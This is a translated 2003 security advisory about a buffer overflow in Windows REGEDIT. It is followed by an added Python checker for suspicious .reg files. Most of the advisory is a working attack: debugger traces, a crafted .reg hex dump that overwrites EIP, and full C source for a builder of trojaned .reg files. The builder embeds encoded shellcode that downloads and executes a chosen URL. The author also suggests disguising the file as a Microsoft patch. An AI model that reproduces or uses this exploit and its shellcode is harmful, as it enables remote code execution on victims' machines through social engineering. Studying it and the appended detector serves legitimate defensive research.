March 31st, 2003 - Translated into English April 7th, 2003

Win32 security Advisory about

**********************************************************************************************
================================ REGEDIT BUFFER OVERFLOW =====================================
**********************************************************************************************
Explanation, Use and Prevent.
**********************************************************************************************
==============================================================================================
**********************************************************************************************

By ThreaT.


INTRODUCTION
____________

On March 29th, 2003, in a lost country near Lyon (France), an overflow vulnerability, commonly
called a 'Buffer Overflow', was found in a standard tool of a well-known OS called Windows ->
REGEDIT. Even though this vuln has _only_ been tested on Win2000 (pro & server) Service Pack
0, 1, 2 and 3, it might be present on the other Microsoft systems built on NT technology, which
is why I ask you to pay the greatest attention to this security advisory.

EXPLANATION
___________

REGEDIT.EXE imports information into the registry using proprietary scripts with the .REG
extension. If such a file contains a value name of more than 260 characters, REGEDIT raises an
'exception error' caused by the function RegSetValueExW, which itself calls into NTDLL.DLL.

Here is the problem:

-----------------------------------------------------------------------------------------------
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Vuln]
"AAAAAAAAAAAAAAAAAAAAA x 270" = "Vulnerable string"
-----------------------------------------------------------------------------------------------

If you try to import this file, you will get this message:

-----------------------------------------------------------------------------------------------
Module Load: C:\WINNT\regedit.exe (symbol loading deferred)
Thread Create: Process=0, Thread=0
Thread Create: Process=0, Thread=1
Second chance exception c0000005 (Access Violation) occurred
Thread stopped.
> rt
EAX=00000006 EBX=00000002 ECX=0006ffe0 EDX=00000000 ESI=77da7d4d EDI=00000000
EIP=00410041 ESP=0006fb24 EBP=00410041 EFL=00000206
CS=001b DS=0023 ES=0023 SS=0023 FS=003b GS=0000
Dr0=e140f91c Dr1=027da8c0 Dr2=8110ac88 Dr3=f4eeaac4 Dr6=80447434 Dr7=80469560
> dd esp
0x0006FB24 00410041 00410041 00410041 00000000 A.A.A.A.A.A.....
-----------------------------------------------------------------------------------------------

As we can see, the stack is completely overwritten by our character string, which is formatted
in WideChar (hence 00410041 = "AA"), and of course we are going to see why, and which call
raises this error...

Let's have a look at REGEDIT while it parses the file: we trace the 'ReadFile' call.
Some help about this API:

BOOL ReadFile(
    HANDLE hFile,                   // handle of file to read
    LPVOID lpBuffer,                // address of buffer that receives data
    DWORD nNumberOfBytesToRead,     // number of bytes to read
    LPDWORD lpNumberOfBytesRead,    // address of number of bytes read
    LPOVERLAPPED lpOverlapped       // address of structure for data
);

OK, let's go.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Disassembly of File: regedit.exe
Code Offset = 00000600, Code Size = 0000AE00
Data Offset = 0000B400, Data Size = 00000200

* Reference To: KERNEL32.ReadFile, Ord:023Dh
:0100820D FF151C110001    Call dword ptr [0100111C]       // look where the

* Reference To: KERNEL32.ReadFile, Ord:023Dh
:01008C27 FF151C110001    Call dword ptr [0100111C]       // different calls to the

* Reference To: KERNEL32.ReadFile, Ord:023Dh
:01008C4D FF151C110001    Call dword ptr [0100111C]       // ReadFile function are (in Regedit)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Module Load: C:\WINNT\regedit.exe (symbol loading deferred)    // we attach the debugger
Thread Create: Process=0, Thread=0
Process attached is stopped
.attach 0x4c4>
> bp 0x100820D                                                 // setting the breakpoints
> bp 0x1008C27
> bp 0x1008C4D
Hard coded breakpoint hit                                      // let's go :)
-
01008C17 6800000100        push 10000h                     // number of bytes to read
01008C1C 68C0C30201        push 102C3C0h                   // address of buffer that receives data
01008C21 FF35C0C30401      push dword ptr ds:[104C3C0h]    // handle of file to read
01008C27 FF151C110001      call dword ptr ds:[100111Ch]    // CALL ReadFile
-
> dd 102C3C0
0x0102C3C0 00690057 0064006e 0077006f 00200073 W.i.n.d.o.w.s. .
0x0102C3D0 00650052 00690067 00740073 00790072 R.e.g.i.s.t.r.y.
0x0102C3E0 00450020 00690064 006f0074 00200072 .E.d.i.t.o.r. .
0x0102C3F0 00650056 00730072 006f0069 0020006e V.e.r.s.i.o.n. .
0x0102C400 002e0035 00300030 000a000d 000a000d 5...0.0.........
0x0102C410 0048005b 0045004b 005f0059 004f004c [.H.K.E.Y._.L.O.
0x0102C420 00410043 005f004c 0041004d 00480043 C.A.L._.M.A.C.H.
0x0102C430 004e0049 005c0045 004f0053 00540046 I.N.E.\.S.O.F.T.
> d
0x0102C440 00410057 00450052 0056005c 006c0075 W.A.R.E.\.V.u.l.
0x0102C450 005d006e 000a000d 00410022 00410041 n.].....".A.A.A.
0x0102C460 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.
0x0102C470 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.
0x0102C480 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.
0x0102C490 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.
0x0102C4A0 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.
0x0102C4B0 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.
>

At the moment, no problem. So, on the road again...

=boom= The call at address 01008956 crashes!

-------------------------------------------------------------------------
01008948 FF75F8            push dword ptr [ebp-8]
0100894B 56                push esi
0100894C FF75FC            push dword ptr [ebp-4]
0100894F 53                push ebx
01008950 FF750C            push dword ptr [ebp+0Ch]
01008953 FF7508            push dword ptr [ebp+8]
01008956 FF1510100001      call dword ptr ds:[1001010h]    // wtf is this call?

> dd ds:1001010                                            // let's ask our girlfriend the stack :)
0x01001010 77da9348 77da90b0 77dadcc7 77dad782 H..w...w...w...w
> dd 77da9348                                              // ok, but...
Module Load: C:\WINNT\SYSTEM32\advapi32.dll (could not open symbol file)   <- hmm, an 'advapi32.dll' function :)))
Addr:77DA9348 Ord: 436 (01B4h) Name: RegSetValueExW       // ok :)

OK, a bit more explanation will be better...

LONG RegSetValueEx(
    HKEY hKey,              // handle of key to set value for
    LPCTSTR lpValueName,    // address of value to set
    DWORD Reserved,         // reserved
    DWORD dwType,           // flag for value type
    CONST BYTE * lpData,    // address of value data
    DWORD cbData            // size of value data
);

We continue...

77DA93E1 FF750C            push dword ptr [ebp+0Ch]
77DA93E4 8D45D4            lea eax,[ebp-2Ch]
77DA93E7 50                push eax
77DA93E8 FF150C13DA77      call dword ptr ds:[77DA130Ch]   // ntdll!RtlInitUnicodeString

-> inside

77F87124 57                push edi
77F87125 8B7C240C          mov edi,dword ptr [esp+0Ch]
77F87129 8B542408          mov edx,dword ptr [esp+8]
77F8712D C70200000000      mov dword ptr [edx],0
77F87133 897A04            mov dword ptr [edx+4],edi
77F87136 0BFF              or edi,edi
77F87138 7415              je 77F8714F
77F8713A 83C9FF            or ecx,0FFFFFFFFh               // ecx = 0xFFFFFFFF ! no check !
77F8713D 33C0              xor eax,eax
77F8713F F266AF            repne scas word ptr [edi]       // SO! OVERWRITE OF THE DEATH
77F87142 F7D1              not ecx
-------------------------------------------------------------------------

The vuln is located in RegSetValueExW, which calls the vulnerable 'ntdll!RtlInitUnicodeString'
function. As you can see, this function uses a poor strcpy and overwrites all the data. And..
I don't know whether this function isn't the most famous vuln in NTDLL! So.. what if we call
this exploit 'NTDLL through REGEDIT' :)


USE
___

Now, stop laughing, and let's look whether there is a way to use this bad bug, hrhr.

As we saw in the explanation, REGEDIT works with WideChar-formatted strings, which is a problem
for hijacking execution after EIP has been overwritten. But, after a good look, we can easily
find a solution to this minor problem.

--------------------------- HEXEDIT -----------------------------
00000000 FFFE 5700 6900 6E00 6400 6F00 7700 7300 ..W.i.n.d.o.w.s.
00000016 2000 5200 6500 6700 6900 7300 7400 7200 .R.e.g.i.s.t.r.
00000032 7900 2000 4500 6400 6900 7400 6F00 7200 y. .E.d.i.t.o.r.
00000048 2000 5600 6500 7200 7300 6900 6F00 6E00 .V.e.r.s.i.o.n.
00000064 2000 3500 2E00 3000 3000 0D00 0A00 0D00 .5...0.0.......
00000080 0A00 5B00 4800 4B00 4500 5900 5F00 4C00 ..[.H.K.E.Y._.L.
00000096 4F00 4300 4100 4C00 5F00 4D00 4100 4300 O.C.A.L._.M.A.C.
00000112 4800 4900 4E00 4500 5C00 5300 4F00 4600 H.I.N.E.\.S.O.F.
00000128 5400 5700 4100 5200 4500 5C00 5600 7500 T.W.A.R.E.\.V.u.
00000144 6C00 6E00 5D00 0D00 0A00 2200 4100 4100 l.n.].....".A.A.
00000160 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000176 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000192 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000208 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000224 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000240 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000256 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000272 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000288 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000304 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000320 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000336 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000352 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000368 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000384 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000400 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000416 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000432 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000448 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000464 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000480 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000496 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000512 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000528 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000544 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000560 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000576 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000592 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000608 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000624 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000640 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000656 4100 4100 4100 4100 4100 4100 4100 4100 A.A.A.A.A.A.A.A.
00000672 4100 4100 4242 4242 2B2B 2B2B 2B2B 2B2B A.A.BBBB++++++++   // BBBB = overwrite of EIP
00000688 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++
00000704 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++   // ++++ = probably shellcode
00000720 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++
00000736 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++
00000752 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++
00000768 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++
00000784 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++
00000800 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++
00000816 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++
00000832 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++
00000848 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++
00000864 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++
00000880 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++
00000896 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++
00000912 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++
00000928 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++
00000944 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B 2B2B ++++++++++++++++
00000960 2B2B 2B2B 2B2B 2B2B 2200 3D00 2200 5600 ++++++++".=.".V.
00000976 7500 6C00 6E00 6500 7200 6100 6200 6C00 u.l.n.e.r.a.b.l.
00000992 6500 2000 7300 7400 7200 6900 6E00 6700 e. .s.t.r.i.n.g.
00001008 2200 0D00 0A00 0D00 0A00                ".........
-----------------------------------------------------------------

So, if I import this file, it gives:

--
Thread Create: Process=0, Thread=1
Second chance exception c0000005 (Access Violation) occurred
Thread stopped.
> rt
EAX=00000006 EBX=00000002 ECX=0006ffe0 EDX=00000000 ESI=77da7d4d EDI=00000000
EIP=42424242 ESP=0006fb24 EBP=00410041 EFL=00000206
CS=001b DS=0023 ES=0023 SS=0023 FS=003b GS=0000
Dr0=00000000 Dr1=ffb6ce48 Dr2=e1378c38 Dr3=f53d3a01 Dr6=00000000 Dr7=e13b9848
>
--

EIP = 42424242 :))) It's a classic BoF (Buffer OverFlow), and, as tradition dictates, the stack
kept a part of our overflow buffer when the crash occurred.

> dd esp
0x0006FB24 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++
0x0006FB34 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++
0x0006FB44 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++
0x0006FB54 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++
0x0006FB64 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++
0x0006FB74 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++
0x0006FB84 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++
0x0006FB94 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++
>

The problem is the return address: it is taken from the stack and comes with NULL bytes, which
takes some freedom of action away from us. But we haven't finished with the ReadFile() function:
where the hell did it put the data? :)

> dd 102C3C0
0x0102C3C0 00690057 0064006e 0077006f 00200073 W.i.n.d.o.w.s. .
0x0102C3D0 00650052 00690067 00740073 00790072 R.e.g.i.s.t.r.y.
0x0102C3E0 00450020 00690064 006f0074 00200072 .E.d.i.t.o.r. .
0x0102C3F0 00650056 00730072 006f0069 0020006e V.e.r.s.i.o.n. .
0x0102C400 002e0035 00300030 000a000d 000a000d 5...0.0.........
0x0102C410 0048005b 0045004b 005f0059 004f004c [.H.K.E.Y._.L.O.
0x0102C420 00410043 005f004c 0041004d 00480043 C.A.L._.M.A.C.H.
0x0102C430 004e0049 005c0045 004f0053 00540046 I.N.E.\.S.O.F.T.
> dd 102C670
0x0102C670 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++
0x0102C680 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++
0x0102C690 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++
0x0102C6A0 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++
0x0102C6B0 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++
0x0102C6C0 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++
0x0102C6D0 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++
0x0102C6E0 2b2b2b2b 2b2b2b2b 2b2b2b2b 2b2b2b2b ++++++++++++++++
>

Enjoy! The 102C760 address points directly at our shellcode, and since ReadFile() now works
with its 'nNumberOfBytesToRead' parameter set to 10000h, we have 65536 bytes free :)


THE EXPLOIT
___________

Now that we have all the information about this vuln, it's time to write an exploit (the real
exploit...). Here is a trivial tiny program that easily builds trojaned .reg files:

------------------------------------------ REGEXPLOIT.C ---------------------------------------------
/***************************************
*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*
*@ REGEDIT Buffer Overflow Exploit ! @*
*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*
*                                     *
*    Discovered & coded By ThreaT.    *
*                                     *
*#####################################*
*# -> ThreaT@Ifrance.com             #*
*# -> http://www.chez.com/mvm        #*
*# -> http://s0h.cc/~threat          #*
*#####################################*
*          Date : 31/03/2003          *
***************************************
*/

/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 * This exploit creates a malicious .reg file    *
 * that, when REGEDIT tries to write its data    *
 * into the registry, overwrites the return      *
 * address, because RegSetValueExW() works on    *
 * an unchecked buffer, and executes our         *
 * arbitrary code, which downloads a trojan for  *
 * local execution without asking the user!      *
 * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 *
 * compile : cl regexploit.c
 * usage   : regexploit.exe <URL>
 *
 * <URL> is a full link to an executable file, it can be like
 * http://www.host.com/trojan.exe or file://c:/path/executable.exe
 */

// Tested on Win2k pro & server (fr) SP0 SP1 SP2 & SP3

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

HANDLE RegFile;

/* Convert an ANSI string to WideChar (UTF-16), the encoding REGEDIT expects in a 5.00 .reg file. */
char *ToWideChar(const char *cszANSIstring)
{
    int nBufSize;
    WCHAR *wideString;

    if (cszANSIstring == NULL)
        return NULL;

    nBufSize = MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, cszANSIstring, -1, NULL, 0);
    wideString = (WCHAR *)malloc((nBufSize + 1) * sizeof(WCHAR));   // nBufSize counts WCHARs, not bytes
    MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, cszANSIstring, -1, wideString, nBufSize);

    return (char *)wideString;
}

void Write(const char *str, int number)
{
    DWORD lpNumberOfBytesWritten;
    WriteFile(RegFile, str, number, &lpNumberOfBytesWritten, NULL);
}

int main(int argc, char *argv[])
{
    int i;
    char entete[] = "Windows Registry Editor Version 5.00\r\n\r\n"
                    "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Discovered\\and\\coded\\by\\ThreaT]\r\n",
         *MastaBuff, *myurl,
         RealGenericShellcode[1024] =    // sized so the URL appended below fits
        "\xA0\xC6\x02\x01"    // return address
        // nop
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        // shellcode decoder
        "\x68\x5E\x56\xC3\x90\x8B\xCC\xFF\xD1\x83\xC6\x0E\x90\x8B\xFE\xAC"
        "\x34\x99\xAA\x84\xC0\x75\xF8"
        // shellcode XORed with 0x99
        "\x72\xeb\xf3\xa9\xc2\xfd\x12\x9a\x12\xd9\x95\x12\xd1\x95\x12\x58\x12\xc5\xbd\x91"
        "\x12\xe9\xa9\x9a\xed\xbd\x9d\xa1\x87\xec\xd5\x12\xd9\x81\x12\xc1\xa5\x9a\x41\x12"
        "\xc2\xe1\x9a\x41\x12\xea\x85\x9a\x69\xcf\x12\xea\xbd\x9a\x69\xcf\x12\xca\xb9\x9a"
        "\x49\x12\xc2\x81\xd2\x12\xad\x03\x9a\x69\x9a\xed\xbd\x8d\x12\xaf\xa2\xed\xbd\x81"
        "\xed\x93\xd2\xba\x42\xec\x73\xc1\xc1\xaa\x59\x5a\xc6\xaa\x50\xff\x12\x95\xc6\xc6"
        "\x12\xa5\x16\x14\x9d\x9e\x5a\x12\x81\x12\x5a\xa2\x58\xec\x04\x5a\x72\xe5\xaa\x42"
        "\xf1\xe0\xdc\xe1\xd8\xf3\x93\xf3\xd2\xca\x71\xe2\x66\x66\x66\xaa\x50\xc8\xf1\xec"
        "\xeb\xf5\xf4\xff\x5e\xdd\xbd\x9d\xf6\xf7\x12\x75\xc8\xc8\xcc\x66\x49\xf1\xf0\xf5"
        "\xfc\xd8\xf3\x97\xf3\xeb\xf3\x9b\x71\xcc\x66\x66\x66\xaa\x42\xca\xf1\xf8\xb7\xfc"
        "\xe1\x5f\xdd\xbd\x9d\xfc\x12\x55\xca\xca\xc8\x66\xec\x81\xca\x66\x49\xaa\x42\xf1"
        "\xf0\xf7\xdc\xe1\xf3\x98\xf3\xd2\xca\x71\xb5\x66\x66\x66\x14\xd5\xbd\x89\xf3\x98"
        "\xc8\x66\x49\xaa\x42\xf1\xe1\xf0\xed\xc9\xf3\x98\xf3\xd2\xca\x71\x8b\x66\x66\x66"
        "\x66\x49\x71\xe6\x66\x66\x66";

    printf("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n"
           "Regedit.exe Buffer Overflow Exploit\n"
           "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n"
           "Discovered & Coded By ThreaT.\n\n"
           "contact : ThreaT@Ifrance.com\n"
           "URL : http://www.chez.com/mvm\n\n");

    if (!argv[1])
    {
        printf("_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_\n"
               "Usage : regexploit.exe <URL>\n"
               "Exemple : regexploit.exe file://c:/winnt/system32/cmd.exe\n"
               "_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_\n");
        ExitProcess(0);
    }

    /* Creation of the malicious .reg file */
    RegFile = CreateFile("VulnFile.reg", GENERIC_WRITE, FILE_SHARE_WRITE,
                         NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (RegFile == INVALID_HANDLE_VALUE)
    {
        printf("Cannot create a vuln regfile !\n");
        ExitProcess(0);
    }

    Write("\xFF\xFE", 2);                                       // header of a .reg script (UTF-16 BOM)
    Write(ToWideChar(entete), strlen(entete) * 2);              // regedit header

    MastaBuff = (char *)LocalAlloc(LPTR, 270);                  // fill the 1st part of the value name
    MastaBuff[0] = '"';
    memset(&MastaBuff[1], '0', 260);                            // with 260 zeros
    Write(ToWideChar(MastaBuff), strlen(MastaBuff) * 2);        // write the 1st part of the vuln string to the file

    myurl = (char *)LocalAlloc(LPTR, strlen(argv[1]) + 10);
    lstrcpy(myurl, argv[1]);                                    // keep a clear copy for the final message
    for (i = 0; i < strlen(argv[1]); argv[1][i++] ^= 0x99);    // encrypt the URL with the shellcode's XOR key

    lstrcat(RealGenericShellcode, argv[1]);                     // final shellcode creation
    lstrcat(RealGenericShellcode, "\x99");                      // end char
    Write(RealGenericShellcode, strlen(RealGenericShellcode));  // add the shellcode to the file

    CloseHandle(RegFile);

    printf("un fichier .reg vulnerable appele VulnFile.reg viens d'etre cree\n"
           "pour downloader et executer '%s'\n", myurl);
    return 0;
}
-----------------------------------------------------------------------------------------------------

D:\code\exploits\regedit>regexploit file://c:/winnt/system32/cmd.exe
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Regedit.exe Buffer Overflow Exploit
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Discovered & Coded By ThreaT.

contact : ThreaT@Ifrance.com
URL : http://www.chez.com/mvm

un fichier .reg vulnerable appele VulnFile.reg viens d'etre cree
pour downloader et executer 'file://c:/winnt/system32/cmd.exe'

D:\code\exploits\regedit>

- This exploit creates a file called VulnFile.reg, named that way to keep a careless admin from
  running or reading it unsafely.

-----------------------------------------------------------------------------------------------------
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Discovered\and\coded\by\ThreaT]
"00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000?A???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
-------------------------------------------------------------------------------------------------------

It would be very easy for a 'hacker' to pass this file off as some unspecified patch recommended
by Microsoft. Knowing that the file can be up to 65535 bytes long, and that our strings are
WideChar-formatted, the shellcode can contain 00 bytes and execute practically anything on the
targeted system, which makes it a propagation vector in the context of a possible viral attack,
or of any other advanced attack! In the case above, the vulnerable file was built to execute
cmd.exe when an import into the Registry is attempted.
This one goes very well: if you load the .reg and answer 'yes' to the confirmation of writing
into the Registry, it crashes at memory address 0x00000000 when importing directly from regedit.
This does not call the vulnerability into question, because the problem comes from my shellcode,
which does not manage to load urlmon.dll in this specific case :p (/me is a poor lamer). It's
time for you to write a shellcode that fits your needs.


PREVENT
_______

To deal with the problem, I tried to apply the patch released against 'NTDLL through WebDAV',
but... either that patch merely corrects the fault in IIS, or it patched another defect.
I will settle for recalling the safety rules, namely to pay attention to .reg files in the
future, and to configure your malicious-extension filter with this new information.

Microsoft has not been notified of this vulnerability yet; hope they have people in charge of
reading French advisories :))


CONTACT
_______

Email : ThreaT@Ifrance.com
URL : http://www.chez.com/mvm

Traduction : GuY - yvan.colona@wanadoo.fr
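As an added example, not part of ThreaT's advisory: a small Python checker for the "malicious-extension filter" the PREVENT section asks for. It decodes a .reg file the way REGEDIT reads it (UTF-16LE behind the FFFE BOM shown in the HEXEDIT dump, or ANSI for REGEDIT4 files) and flags value names long enough to reach the fault described in EXPLANATION, names whose opening quote is never closed (the shape of the generated VulnFile.reg), and names carrying non-printable characters. The 260-character threshold is taken from the advisory; the test files are constructed, not captured.

```python
from typing import List, Optional, Tuple

# Threshold taken from the advisory: REGEDIT faults on value names of 260 or more
# characters, so any name at or above it is treated as hostile.
MAX_VALUE_NAME_LEN = 260
UTF16_BOM = b"\xff\xfe"

Finding = Tuple[int, str, int]   # (line number, reason, value-name length)


def decode_reg(data: bytes) -> str:
    """Decode a .reg file the way REGEDIT reads it.

    'Windows Registry Editor Version 5.00' files are UTF-16LE behind a FFFE BOM;
    legacy REGEDIT4 files are ANSI. Undecodable bytes are replaced, not dropped,
    so a binary payload glued onto a value name still becomes countable characters.
    """
    if data.startswith(UTF16_BOM):
        return data[len(UTF16_BOM):].decode("utf-16-le", errors="replace")
    return data.decode("cp1252", errors="replace")


def split_value_name(line: str) -> Optional[Tuple[str, bool]]:
    """For a value line ("name"=data) return (name, closed); None for other lines.

    closed is False when the opening quote is never matched on the line, which is
    exactly how 260 zeros followed by raw bytes looks after decoding.
    Backslash escapes inside the name are honoured.
    """
    if not line.startswith('"'):
        return None
    chars, i = [], 1
    while i < len(line):
        c = line[i]
        if c == "\\" and i + 1 < len(line):
            chars.append(line[i + 1])
            i += 2
            continue
        if c == '"':
            return "".join(chars), True
        chars.append(c)
        i += 1
    return "".join(chars), False


def scan_reg(data: bytes) -> List[Finding]:
    """Return one finding per suspicious property of each value name."""
    findings: List[Finding] = []
    for lineno, line in enumerate(decode_reg(data).splitlines(), start=1):
        parsed = split_value_name(line)
        if parsed is None:
            continue
        name, closed = parsed
        if len(name) >= MAX_VALUE_NAME_LEN:
            findings.append((lineno, "value name too long", len(name)))
        if not closed:
            findings.append((lineno, "unterminated value name", len(name)))
        if any(not ch.isprintable() for ch in name):
            findings.append((lineno, "non-printable bytes in value name", len(name)))
    return findings


def make_reg(entries: List[str]) -> bytes:
    """Constructed test input: a UTF-16LE .reg file with the advisory's header and key."""
    body = "Windows Registry Editor Version 5.00\r\n\r\n[HKEY_LOCAL_MACHINE\\SOFTWARE\\Vuln]\r\n"
    body += "".join(entry + "\r\n" for entry in entries)
    return UTF16_BOM + body.encode("utf-16-le")


if __name__ == "__main__":
    print(scan_reg(make_reg(['"Setting"="ok"'])))                            # []
    print(scan_reg(make_reg(['"' + "A" * 270 + '"="Vulnerable string"'])))  # [(4, 'value name too long', 270)]
```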